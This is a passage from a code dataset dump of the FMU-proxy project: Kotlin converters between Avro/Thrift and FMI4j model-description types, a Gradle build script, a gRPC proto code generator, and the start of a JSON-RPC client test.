no.mechatronics.sfi.fmi4j.modeldescription.misc.VariableNamingConvention\nimport no.mechatronics.sfi.fmi4j.modeldescription.structure.DependenciesKind\nimport no.mechatronics.sfi.fmi4j.modeldescription.structure.ModelStructure\nimport no.mechatronics.sfi.fmi4j.modeldescription.structure.Unknown\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.*\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.BooleanAttribute\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.Causality\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.EnumerationAttribute\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.Initial\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.IntegerAttribute\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.RealAttribute\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.ScalarVariable\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.StringAttribute\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.Variability\nimport no.mechatronics.sfi.fmuproxy.Solver\n\ninternal fun Status.convert(): FmiStatus {\n return when(this) {\n Status.OK_STATUS -> FmiStatus.OK\n Status.DISCARD_STATUS -> FmiStatus.Discard\n Status.ERROR_STATUS -> FmiStatus.Error\n Status.WARNING_STATUS -> FmiStatus.Warning\n Status.PENDING_STATUS -> FmiStatus.Pending\n Status.FATAL_STATUS -> FmiStatus.Fatal\n }\n}\n\ninternal fun 
no.mechatronics.sfi.fmuproxy.avro.DependenciesKind.convert(): DependenciesKind {\n return when(this) {\n no.mechatronics.sfi.fmuproxy.avro.DependenciesKind.CONSTANT_KIND -> DependenciesKind.CONSTANT\n no.mechatronics.sfi.fmuproxy.avro.DependenciesKind.DEPENDENT_KIND -> DependenciesKind.DEPENDENT\n no.mechatronics.sfi.fmuproxy.avro.DependenciesKind.DISCRETE_KIND -> DependenciesKind.DISCRETE\n no.mechatronics.sfi.fmuproxy.avro.DependenciesKind.TUNABLE_KIND -> DependenciesKind.TUNABLE\n }\n}\n\ninternal fun no.mechatronics.sfi.fmuproxy.avro.VariableNamingConvention.convert(): VariableNamingConvention {\n return when(this) {\n no.mechatronics.sfi.fmuproxy.avro.VariableNamingConvention.FLAT -> VariableNamingConvention.FLAT\n no.mechatronics.sfi.fmuproxy.avro.VariableNamingConvention.STRUCTURED -> VariableNamingConvention.STRUCTURED\n }\n}\n\ninternal fun no.mechatronics.sfi.fmuproxy.avro.Causality.convert(): Causality {\n return when(this) {\n no.mechatronics.sfi.fmuproxy.avro.Causality.CALCULATED_PARAMETER_CAUSALITY -> Causality.CALCULATED_PARAMETER\n no.mechatronics.sfi.fmuproxy.avro.Causality.INDEPENDENT_CAUSALITY -> Causality.INDEPENDENT\n no.mechatronics.sfi.fmuproxy.avro.Causality.INPUT_CAUSALITY -> Causality.INPUT\n no.mechatronics.sfi.fmuproxy.avro.Causality.LOCAL_CAUSALITY -> Causality.LOCAL\n no.mechatronics.sfi.fmuproxy.avro.Causality.OUTPUT_CAUSALITY -> Causality.OUTPUT\n no.mechatronics.sfi.fmuproxy.avro.Causality.PARAMETER_CAUSALITY -> Causality.PARAMETER\n }\n}\n\n\ninternal fun no.mechatronics.sfi.fmuproxy.avro.Variability.convert(): Variability {\n return when(this) {\n no.mechatronics.sfi.fmuproxy.avro.Variability.CONSTANT_VARIABILITY -> Variability.CONSTANT\n no.mechatronics.sfi.fmuproxy.avro.Variability.CONTINUOUS_VARIABILITY -> Variability.CONTINUOUS\n no.mechatronics.sfi.fmuproxy.avro.Variability.DISCRETE_VARIABILITY -> Variability.DISCRETE\n no.mechatronics.sfi.fmuproxy.avro.Variability.FIXED_VARIABILITY -> Variability.FIXED\n no.mechatronics.sfi.fmuproxy.avro.Variability.TUNABLE_VARIABILITY -> Variability.TUNABLE\n }\n}\n\ninternal fun no.mechatronics.sfi.fmuproxy.avro.Initial.convert(): Initial {\n return when(this) {\n no.mechatronics.sfi.fmuproxy.avro.Initial.APPROX_INITIAL -> Initial.APPROX\n no.mechatronics.sfi.fmuproxy.avro.Initial.CALCULATED_INITIAL -> Initial.CALCULATED\n no.mechatronics.sfi.fmuproxy.avro.Initial.EXACT_INITIAL -> Initial.EXACT\n }\n}\n\ninternal fun IntegerRead.convert(): FmuIntegerRead {\n return FmuIntegerRead(value, status.convert())\n}\n\ninternal fun IntegerArrayRead.convert(): FmuIntegerArrayRead {\n return FmuIntegerArrayRead(value.toIntArray(), status.convert())\n}\n\ninternal fun RealRead.convert(): FmuRealRead {\n return FmuRealRead(value, status.convert())\n}\n\ninternal fun RealArrayRead.convert(): FmuRealArrayRead {\n return FmuRealArrayRead(value.toDoubleArray(), status.convert())\n}\n\ninternal fun StringRead.convert(): FmuStringRead {\n return FmuStringRead(value, status.convert())\n}\n\ninternal fun StringArrayRead.convert(): FmuStringArrayRead {\n return FmuStringArrayRead(value.toTypedArray(), status.convert())\n}\n\ninternal fun BooleanRead.convert(): FmuBooleanRead {\n return FmuBooleanRead(value, status.convert())\n}\n\ninternal fun BooleanArrayRead.convert(): FmuBooleanArrayRead {\n return FmuBooleanArrayRead(value.toBooleanArray(), status.convert())\n}\n\ninternal fun no.mechatronics.sfi.fmuproxy.avro.DefaultExperiment.convert(): DefaultExperiment {\n return DefaultExperiment(\n startTime = startTime,\n stopTime = 
stopTime,\n tolerance = tolerance,\n stepSize = stepSize\n )\n}\n\ninternal fun no.mechatronics.sfi.fmuproxy.avro.Unknown.convert(): Unknown {\n return object: Unknown {\n override val dependencies: List<Int>\n get() = getDependencies() ?: emptyList()\n override val dependenciesKind: DependenciesKind?\n get() = getDependenciesKind()?.convert()\n override val index: Int\n get() = getIndex()\n }\n}\n\ninternal fun no.mechatronics.sfi.fmuproxy.avro.ModelStructure.convert(): ModelStructure {\n return object: ModelStructure {\n override val derivatives: List<Unknown>\n get() = getDerivatives()?.map { it.convert() } ?: emptyList()\n override val initialUnknowns: List<Unknown>\n get() = getInitialUnknowns()?.map { it.convert() } ?: emptyList()\n override val outputs: List<Unknown>\n get() = getOutputs()?.map { it.convert() } ?: emptyList()\n }\n}\n\ninternal fun no.mechatronics.sfi.fmuproxy.avro.IntegerAttribute.convert(): IntegerAttribute {\n return IntegerAttribute(\n min = min,\n max = max,\n start = start\n )\n}\n\ninternal fun no.mechatronics.sfi.fmuproxy.avro.RealAttribute.convert(): RealAttribute {\n return RealAttribute(\n min = min,\n max = max,\n start = start\n )\n}\n\ninternal fun no.mechatronics.sfi.fmuproxy.avro.StringAttribute.convert(): StringAttribute {\n return StringAttribute(\n start = start\n )\n}\n\ninternal fun no.mechatronics.sfi.fmuproxy.avro.BooleanAttribute.convert(): BooleanAttribute {\n return BooleanAttribute(\n start = start\n )\n}\n\ninternal fun no.mechatronics.sfi.fmuproxy.avro.EnumerationAttribute.convert(): EnumerationAttribute {\n return EnumerationAttribute(\n min = min,\n max = max,\n start = start\n )\n}\n\n\ninternal fun no.mechatronics.sfi.fmuproxy.avro.ScalarVariable.convert(): TypedScalarVariable<*> {\n\n val v = ScalarVariableImpl(\n name = name,\n description = description,\n valueReference = valueReference,\n declaredType = declaredType,\n causality = causality?.convert(),\n variability = variability?.convert(),\n initial = initial?.convert()\n )\n\n val attribute = attribute\n when (attribute) {\n is no.mechatronics.sfi.fmuproxy.avro.IntegerAttribute -> v.integerAttribute = attribute.convert()\n is no.mechatronics.sfi.fmuproxy.avro.RealAttribute -> v.realAttribute = attribute.convert()\n is no.mechatronics.sfi.fmuproxy.avro.StringAttribute -> v.stringAttribute = attribute.convert()\n is no.mechatronics.sfi.fmuproxy.avro.BooleanAttribute -> v.booleanAttribute = attribute.convert()\n is no.mechatronics.sfi.fmuproxy.avro.EnumerationAttribute -> v.enumerationAttribute = attribute.convert()\n else -> throw AssertionError()\n }\n\n return v.toTyped()\n\n}\n\ninternal fun List<no.mechatronics.sfi.fmuproxy.avro.ScalarVariable>.convert(): ModelVariables {\n return object : ModelVariables {\n override val variables: List<TypedScalarVariable<*>> by lazy {\n [email protected] { it.convert() }\n }\n }\n}\n\ninternal fun ModelDescription.convert(): CommonModelDescription {\n return AvroModelDescription(this)\n}\n\nclass AvroModelDescription(\n val modelDescription: ModelDescription\n): CommonModelDescription {\n\n override val author: String?\n get() = modelDescription.author\n override val copyright: String?\n get() = modelDescription.copyright\n override val defaultExperiment: DefaultExperiment? 
= modelDescription.defaultExperiment?.convert()\n override val description: String?\n get() = modelDescription.description\n override val fmiVersion: String\n get() = modelDescription.fmiVersion\n override val generationDateAndTime: String?\n get() = modelDescription.generationDateAndTime\n override val generationTool: String?\n get() = modelDescription.generationTool\n override val guid: String\n get() = modelDescription.guid\n override val license: String?\n get() = modelDescription.license\n override val logCategories: LogCategories?\n get() = null\n override val modelName: String\n get() = modelDescription.modelName\n override val modelStructure: ModelStructure = modelDescription.modelStructure.convert()\n override val modelVariables: ModelVariables = modelDescription.modelVariables.convert()\n override val supportsCoSimulation: Boolean\n get() = modelDescription.supportsCoSimulation\n override val supportsModelExchange: Boolean\n get() = modelDescription.supportsModelExchange\n override val variableNamingConvention: VariableNamingConvention? = modelDescription.variableNamingConvention?.convert()\n override val version: String?\n get() = modelDescription.version\n}\n\nfun Solver.avroType(): no.mechatronics.sfi.fmuproxy.avro.Solver {\n return no.mechatronics.sfi.fmuproxy.avro.Solver(name, settings)\n}" }, { "alpha_fraction": 0.7431055903434753, "alphanum_fraction": 0.7463353872299194, "avg_line_length": 42.753623962402344, "blob_id": "2f39da436a41da5156620c64a38be751ee5a01c0", "content_id": "87348ca5e3a6a9ee19a05ad996fbeb051628c468", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 12075, "license_type": "permissive", "max_line_length": 171, "num_lines": 276, "path": "/java/FMU-proxy/fmu-proxy-clients/src/main/kotlin/no/mechatronics/sfi/fmuproxy/thrift/extensions.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology (NTNU)\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\npackage no.mechatronics.sfi.fmuproxy.thrift\n\nimport no.mechatronics.sfi.fmi4j.common.*\nimport no.mechatronics.sfi.fmi4j.modeldescription.CommonModelDescription\nimport no.mechatronics.sfi.fmi4j.modeldescription.misc.LogCategories\nimport no.mechatronics.sfi.fmi4j.modeldescription.structure.ModelStructure\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.*\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.BooleanAttribute\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.Causality\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.EnumerationAttribute\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.Initial\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.IntegerAttribute\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.RealAttribute\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.StringAttribute\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.Variability\nimport no.mechatronics.sfi.fmuproxy.Solver\n\n\ninternal fun Status.convert(): FmiStatus {\n return when(this) {\n Status.OK_STATUS -> FmiStatus.OK\n Status.DISCARD_STATUS -> FmiStatus.Discard\n Status.ERROR_STATUS -> FmiStatus.Error\n Status.WARNING_STATUS -> FmiStatus.Warning\n Status.PENDING_STATUS -> FmiStatus.Pending\n Status.FATAL_STATUS -> FmiStatus.Fatal\n }\n}\n\n\ninternal fun no.mechatronics.sfi.fmuproxy.thrift.Causality.convert(): Causality {\n return when(this) {\n no.mechatronics.sfi.fmuproxy.thrift.Causality.CALCULATED_PARAMETER_CAUSALITY -> Causality.CALCULATED_PARAMETER\n no.mechatronics.sfi.fmuproxy.thrift.Causality.INDEPENDENT_CAUSALITY -> Causality.INDEPENDENT\n no.mechatronics.sfi.fmuproxy.thrift.Causality.INPUT_CAUSALITY -> Causality.INPUT\n no.mechatronics.sfi.fmuproxy.thrift.Causality.LOCAL_CAUSALITY -> Causality.LOCAL\n no.mechatronics.sfi.fmuproxy.thrift.Causality.OUTPUT_CAUSALITY -> Causality.OUTPUT\n no.mechatronics.sfi.fmuproxy.thrift.Causality.PARAMETER_CAUSALITY -> Causality.PARAMETER\n }\n}\n\n\ninternal fun no.mechatronics.sfi.fmuproxy.thrift.Variability.convert(): Variability {\n return when(this) {\n no.mechatronics.sfi.fmuproxy.thrift.Variability.CONSTANT_VARIABILITY -> Variability.CONSTANT\n no.mechatronics.sfi.fmuproxy.thrift.Variability.CONTINUOUS_VARIABILITY -> Variability.CONTINUOUS\n no.mechatronics.sfi.fmuproxy.thrift.Variability.DISCRETE_VARIABILITY -> Variability.DISCRETE\n no.mechatronics.sfi.fmuproxy.thrift.Variability.FIXED_VARIABILITY -> Variability.FIXED\n no.mechatronics.sfi.fmuproxy.thrift.Variability.TUNABLE_VARIABILITY -> Variability.TUNABLE\n }\n}\n\ninternal fun no.mechatronics.sfi.fmuproxy.thrift.Initial.convert(): Initial {\n return when(this) {\n no.mechatronics.sfi.fmuproxy.thrift.Initial.APPROX_INITIAL -> Initial.APPROX\n no.mechatronics.sfi.fmuproxy.thrift.Initial.CALCULATED_INITIAL -> Initial.CALCULATED\n no.mechatronics.sfi.fmuproxy.thrift.Initial.EXACT_INITIAL -> Initial.EXACT\n }\n}\n\ninternal fun DependenciesKind.convert(): no.mechatronics.sfi.fmi4j.modeldescription.structure.DependenciesKind {\n return when(this) {\n no.mechatronics.sfi.fmuproxy.thrift.DependenciesKind.CONSTANT_KIND -> no.mechatronics.sfi.fmi4j.modeldescription.structure.DependenciesKind.CONSTANT\n 
no.mechatronics.sfi.fmuproxy.thrift.DependenciesKind.DEPENDENT_KIND -> no.mechatronics.sfi.fmi4j.modeldescription.structure.DependenciesKind.DEPENDENT\n no.mechatronics.sfi.fmuproxy.thrift.DependenciesKind.DISCRETE_KIND -> no.mechatronics.sfi.fmi4j.modeldescription.structure.DependenciesKind.DISCRETE\n no.mechatronics.sfi.fmuproxy.thrift.DependenciesKind.TUNABLE_KIND ->no.mechatronics.sfi.fmi4j.modeldescription.structure. DependenciesKind.TUNABLE\n }\n}\n\ninternal fun VariableNamingConvention.convert(): no.mechatronics.sfi.fmi4j.modeldescription.misc.VariableNamingConvention {\n return when(this) {\n VariableNamingConvention.FLAT -> no.mechatronics.sfi.fmi4j.modeldescription.misc.VariableNamingConvention.FLAT\n VariableNamingConvention.STRUCTURED -> no.mechatronics.sfi.fmi4j.modeldescription.misc.VariableNamingConvention.STRUCTURED\n }\n}\n\ninternal fun IntegerRead.convert(): FmuIntegerRead {\n return FmuIntegerRead(value, status.convert())\n}\n\ninternal fun IntegerArrayRead.convert(): FmuIntegerArrayRead {\n return FmuIntegerArrayRead(value.toIntArray(), status.convert())\n}\n\ninternal fun RealRead.convert(): FmuRealRead {\n return FmuRealRead(value, status.convert())\n}\n\ninternal fun RealArrayRead.convert(): FmuRealArrayRead {\n return FmuRealArrayRead(value.toDoubleArray(), status.convert())\n}\n\ninternal fun StringRead.convert(): FmuStringRead {\n return FmuStringRead(value, status.convert())\n}\n\ninternal fun StringArrayRead.convert(): FmuStringArrayRead {\n return FmuStringArrayRead(value.toTypedArray(), status.convert())\n}\n\ninternal fun BooleanRead.convert(): FmuBooleanRead {\n return FmuBooleanRead(isValue, status.convert())\n}\n\ninternal fun BooleanArrayRead.convert(): FmuBooleanArrayRead {\n return FmuBooleanArrayRead(value.toBooleanArray(), status.convert())\n}\n\ninternal fun DefaultExperiment.convert(): no.mechatronics.sfi.fmi4j.modeldescription.misc.DefaultExperiment {\n return no.mechatronics.sfi.fmi4j.modeldescription.misc.DefaultExperiment(\n startTime = startTime,\n stopTime = stopTime,\n tolerance = tolerance,\n stepSize = stepSize\n )\n}\n\ninternal fun Unknown.convert(): no.mechatronics.sfi.fmi4j.modeldescription.structure.Unknown {\n return object: no.mechatronics.sfi.fmi4j.modeldescription.structure.Unknown {\n override val dependencies: List<Int>\n get() = getDependencies() ?: emptyList()\n override val dependenciesKind: no.mechatronics.sfi.fmi4j.modeldescription.structure.DependenciesKind?\n get() = getDependenciesKind()?.convert()\n override val index: Int\n get() = getIndex()\n }\n}\n\n\ninternal fun no.mechatronics.sfi.fmuproxy.thrift.ModelStructure.convert(): ModelStructure {\n return object: ModelStructure {\n override val derivatives: List<no.mechatronics.sfi.fmi4j.modeldescription.structure.Unknown>\n get() = getDerivatives()?.map { it.convert() } ?: emptyList()\n override val initialUnknowns: List<no.mechatronics.sfi.fmi4j.modeldescription.structure.Unknown>\n get() = getInitialUnknowns()?.map { it.convert() } ?: emptyList()\n override val outputs: List<no.mechatronics.sfi.fmi4j.modeldescription.structure.Unknown>\n get() = getOutputs()?.map { it.convert() } ?: emptyList()\n }\n}\n\ninternal fun no.mechatronics.sfi.fmuproxy.thrift.IntegerAttribute.convert(): IntegerAttribute {\n return IntegerAttribute(\n min = min,\n max = max,\n start = start\n )\n}\n\ninternal fun no.mechatronics.sfi.fmuproxy.thrift.RealAttribute.convert(): RealAttribute {\n return RealAttribute(\n min = min,\n max = max,\n start = start\n )\n}\n\ninternal fun 
no.mechatronics.sfi.fmuproxy.thrift.StringAttribute.convert(): StringAttribute {\n return StringAttribute(\n start = start\n )\n}\n\ninternal fun no.mechatronics.sfi.fmuproxy.thrift.BooleanAttribute.convert(): BooleanAttribute {\n return BooleanAttribute(\n start = isStart\n )\n}\n\ninternal fun no.mechatronics.sfi.fmuproxy.thrift.EnumerationAttribute.convert(): EnumerationAttribute {\n return EnumerationAttribute(\n min = min,\n max = max,\n start = start\n )\n}\n\ninternal fun no.mechatronics.sfi.fmuproxy.thrift.ScalarVariable.convert(): TypedScalarVariable<*> {\n\n val v = ScalarVariableImpl(\n name = name,\n description = description,\n valueReference = valueReference,\n declaredType = declaredType,\n causality = causality?.convert(),\n variability = variability?.convert(),\n initial = initial?.convert()\n )\n\n when {\n attribute.isSetIntegerAttribute -> v.integerAttribute = attribute.integerAttribute.convert()\n attribute.isSetRealAttribute -> v.realAttribute = attribute.realAttribute.convert()\n attribute.isSetStringAttribute -> v.stringAttribute = attribute.stringAttribute.convert()\n attribute.isSetBooleanAttribute -> v.booleanAttribute = attribute.booleanAttribute.convert()\n attribute.isSetEnumerationAttribute -> v.enumerationAttribute = attribute.enumerationAttribute.convert()\n else -> throw AssertionError(\"All attributes are null!\")\n }\n\n return v.toTyped()\n\n}\n\ninternal fun List<no.mechatronics.sfi.fmuproxy.thrift.ScalarVariable>.convert(): ModelVariables {\n return object : ModelVariables {\n override val variables: List<TypedScalarVariable<*>> by lazy {\n [email protected] { it.convert() }\n }\n }\n}\n\ninternal fun ModelDescription.convert(): CommonModelDescription {\n return ThriftModelDescription(this)\n}\n\nclass ThriftModelDescription(\n val modelDescription: ModelDescription\n): CommonModelDescription {\n\n override val author: String?\n get() = modelDescription.author\n override val copyright: String?\n get() = modelDescription.copyright\n override val defaultExperiment: no.mechatronics.sfi.fmi4j.modeldescription.misc.DefaultExperiment? = modelDescription.defaultExperiment?.convert()\n override val description: String?\n get() = modelDescription.description\n override val fmiVersion: String\n get() = modelDescription.fmiVersion\n override val generationDateAndTime: String?\n get() = modelDescription.generationDateAndTime\n override val generationTool: String?\n get() = modelDescription.generationTool\n override val guid: String\n get() = modelDescription.guid\n override val license: String?\n get() = modelDescription.license\n override val logCategories: LogCategories?\n get() = null\n override val modelName: String\n get() = modelDescription.modelName\n override val modelStructure: ModelStructure = modelDescription.modelStructure.convert()\n override val modelVariables: ModelVariables = modelDescription.modelVariables.convert()\n override val supportsCoSimulation: Boolean\n get() = modelDescription.isSupportsCoSimulation\n override val supportsModelExchange: Boolean\n get() = modelDescription.isSupportsModelExchange\n override val variableNamingConvention: no.mechatronics.sfi.fmi4j.modeldescription.misc.VariableNamingConvention? 
= modelDescription.variableNamingConvention?.convert()\n override val version: String?\n get() = modelDescription.version\n}\n\nfun Solver.thriftType(): no.mechatronics.sfi.fmuproxy.thrift.Solver {\n return no.mechatronics.sfi.fmuproxy.thrift.Solver(name, settings)\n}" }, { "alpha_fraction": 0.6102903485298157, "alphanum_fraction": 0.6316862106323242, "avg_line_length": 19.216495513916016, "blob_id": "421aeb0425d87b9912a8e9bbb0998adfcca41f57", "content_id": "350ba1c007b983f40b76e50f3dbfd52a81f81522", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Gradle", "length_bytes": 1963, "license_type": "permissive", "max_line_length": 109, "num_lines": 97, "path": "/java/FMU-proxy/fmu-proxy-gen/src/main/resources/build.gradle", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "\nprintln \"Gradle version is ${GradleVersion.current().version}\"\n\nbuildscript {\n ext.kotlin_version = '1.2.41'\n\n repositories {\n mavenCentral()\n }\n dependencies {\n classpath \"org.jetbrains.kotlin:kotlin-gradle-plugin:$kotlin_version\"\n }\n}\n\nbuildscript {\n repositories {\n jcenter()\n }\n dependencies {\n classpath 'com.github.jengelman.gradle.plugins:shadow:2.0.4'\n }\n}\n\nbuildscript {\n repositories {\n mavenCentral()\n }\n dependencies {\n classpath 'com.google.protobuf:protobuf-gradle-plugin:0.8.5'\n }\n}\n\napply plugin: 'kotlin'\napply plugin: 'application'\napply plugin: 'com.google.protobuf'\napply plugin: 'com.github.johnrengelman.shadow'\n\nmainClassName = \"no.mechatronics.sfi.fmuproxy.Main\"\n\nwrapper {\n gradleVersion = '4.7'\n}\n\nconfigurations.all {\n resolutionStrategy.cacheChangingModulesFor 0, 'seconds'\n}\n\nrepositories {\n mavenCentral()\n maven {\n url \"https://oss.sonatype.org/content/repositories/snapshots/\"\n }\n}\n\ndependencies {\n\n compile \"org.jetbrains.kotlin:kotlin-stdlib-jdk8:$kotlin_version\"\n\n compile group: 'no.mechatronics.sfi.fmuproxy', name: 'fmu-proxy', version: '0.1-SNAPSHOT', changing: true\n\n implementation group: 'org.slf4j', name: 'slf4j-api', version: '1.7.25'\n runtimeOnly group: 'org.slf4j', name: 'slf4j-log4j12', version: '1.7.25'\n\n}\n\ncompileKotlin {\n kotlinOptions.jvmTarget = \"1.8\"\n}\ncompileTestKotlin {\n kotlinOptions.jvmTarget = \"1.8\"\n}\n\nshadowJar {\n baseName = project.name\n classifier = null\n version = null\n}\n\nprotobuf {\n generatedFilesBaseDir = \"$projectDir/src\"\n protoc {\n artifact = 'com.google.protobuf:protoc:3.5.1'\n }\n plugins {\n grpc {\n artifact = 'io.grpc:protoc-gen-grpc-java:1.12.0'\n }\n }\n generateProtoTasks {\n\n ofSourceSet('main')*.plugins {\n grpc {\n outputSubDir = 'java'\n }\n }\n }\n\n}\n\n" }, { "alpha_fraction": 0.6720321774482727, "alphanum_fraction": 0.6767270565032959, "avg_line_length": 35.814815521240234, "blob_id": "1afa9502f1f0cc7b2f45d3f5052f9203308ffcf4", "content_id": "23ea593af06986843bc35b5adc3e8b1aa85a3af7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 2982, "license_type": "permissive", "max_line_length": 113, "num_lines": 81, "path": "/java/FMU-proxy/fmu-proxy-gen/src/main/kotlin/no/mechatronics/sfi/fmuproxy/codegen/ProtoGen.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in 
the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\npackage no.mechatronics.sfi.fmuproxy.codegen\n\nimport no.mechatronics.sfi.fmi4j.modeldescription.CommonModelDescription\nimport no.mechatronics.sfi.fmuproxy.PROTO_SRC_OUTPUT_FOLDER\nimport no.mechatronics.sfi.fmuproxy.utils.FileFuture\nimport no.mechatronics.sfi.fmuproxy.utils.getProtoType\nimport no.mechatronics.sfi.fmuproxy.utils.isArray\nimport org.jtwig.JtwigModel\nimport org.jtwig.JtwigTemplate\nimport org.slf4j.Logger\nimport org.slf4j.LoggerFactory\nimport java.io.File\n\n\n/**\n *\n * @author Lars Ivar Hatledal\n */\nobject ProtoGen {\n\n private val LOG: Logger = LoggerFactory.getLogger(ProtoGen::class.java)\n\n fun generateProtoCode(modelDescription: CommonModelDescription, baseFile: File) {\n\n val instanceServices = StringBuilder().apply {\n\n modelDescription.modelVariables.forEach({\n val isArray = isArray(it.name)\n if (!isArray) {\n\n append(\"\"\"\n rpc Read_${convertName(it.name)} (UInt) returns (${getProtoType(it)}Read);\n\n rpc Write_${convertName(it.name)} (Instance${getProtoType(it)}Write) returns (StatusResponse);\n \"\"\")\n\n }\n\n })\n }.toString()\n\n FileFuture(\n name = \"unique_service.proto\",\n text = JtwigTemplate.classpathTemplate(\"templates/proto/unique_service.proto\").let { template ->\n template.render(JtwigModel.newModel()\n .with(\"fmuName\", modelDescription.modelName)\n .with(\"instanceServices\", instanceServices))\n }\n ).create(File(baseFile, \"${PROTO_SRC_OUTPUT_FOLDER}\"))\n\n }\n\n private fun convertName(str: String) =\n str.substring(0, 1)\n .toUpperCase() + str.substring(1)\n .replace(\".\", \"_\")\n}\n" }, { "alpha_fraction": 0.670735239982605, "alphanum_fraction": 0.6814879179000854, "avg_line_length": 31.78095245361328, "blob_id": "866d67e505d01fbd7d3bdca37ef6c9a16b81eddc", "content_id": "ef8bb63d14b2fd3c7c235329abc9a8e76c3618cf", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 3441, "license_type": "permissive", "max_line_length": 89, "num_lines": 105, "path": "/java/FMU-proxy/fmu-proxy/src/test/kotlin/no/mechatronics/sfi/fmuproxy/jsonrpc/TestJsonRpcClients.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "package no.mechatronics.sfi.fmuproxy.jsonrpc\n\nimport info.laht.yajrpc.RpcHandler\nimport info.laht.yajrpc.net.http.RpcHttpClient\nimport info.laht.yajrpc.net.tcp.RpcTcpClient\nimport info.laht.yajrpc.net.ws.RpcWebSocketClient\nimport info.laht.yajrpc.net.zmq.RpcZmqClient\nimport no.mechatronics.sfi.fmi4j.common.FmiStatus\nimport no.mechatronics.sfi.fmi4j.fmu.Fmu\nimport 
no.mechatronics.sfi.fmi4j.modeldescription.CommonModelDescription\nimport no.mechatronics.sfi.fmuproxy.FmuProxy\nimport no.mechatronics.sfi.fmuproxy.FmuProxyBuilder\nimport no.mechatronics.sfi.fmuproxy.TestUtils\nimport no.mechatronics.sfi.fmuproxy.jsonrpc.service.RpcFmuService\nimport no.mechatronics.sfi.fmuproxy.runInstance\nimport org.junit.jupiter.api.AfterAll\nimport org.junit.jupiter.api.Assertions\nimport org.junit.jupiter.api.Test\nimport org.junit.jupiter.api.TestInstance\nimport org.junit.jupiter.api.condition.EnabledIfEnvironmentVariable\nimport org.junit.jupiter.api.condition.EnabledOnOs\nimport org.junit.jupiter.api.condition.OS\nimport org.slf4j.Logger\nimport org.slf4j.LoggerFactory\nimport java.io.File\n\n@EnabledOnOs(OS.WINDOWS)\n@TestInstance(TestInstance.Lifecycle.PER_CLASS)\n@EnabledIfEnvironmentVariable(named = \"TEST_FMUs\", matches = \".*\")\nclass TestJsonRpcClients {\n\n companion object {\n\n val LOG: Logger = LoggerFactory.getLogger(TestJsonRpcClients::class.java)\n\n private const val wsPort = 8001\n private const val tcpPort = 8002\n private const val zmqPort = 8003\n private const val httpPort = 8004\n\n }\n\n private val fmu: Fmu\n private var proxy: FmuProxy\n private var modelDescription: CommonModelDescription\n\n init {\n\n fmu = Fmu.from(File(TestUtils.getTEST_FMUs(),\n 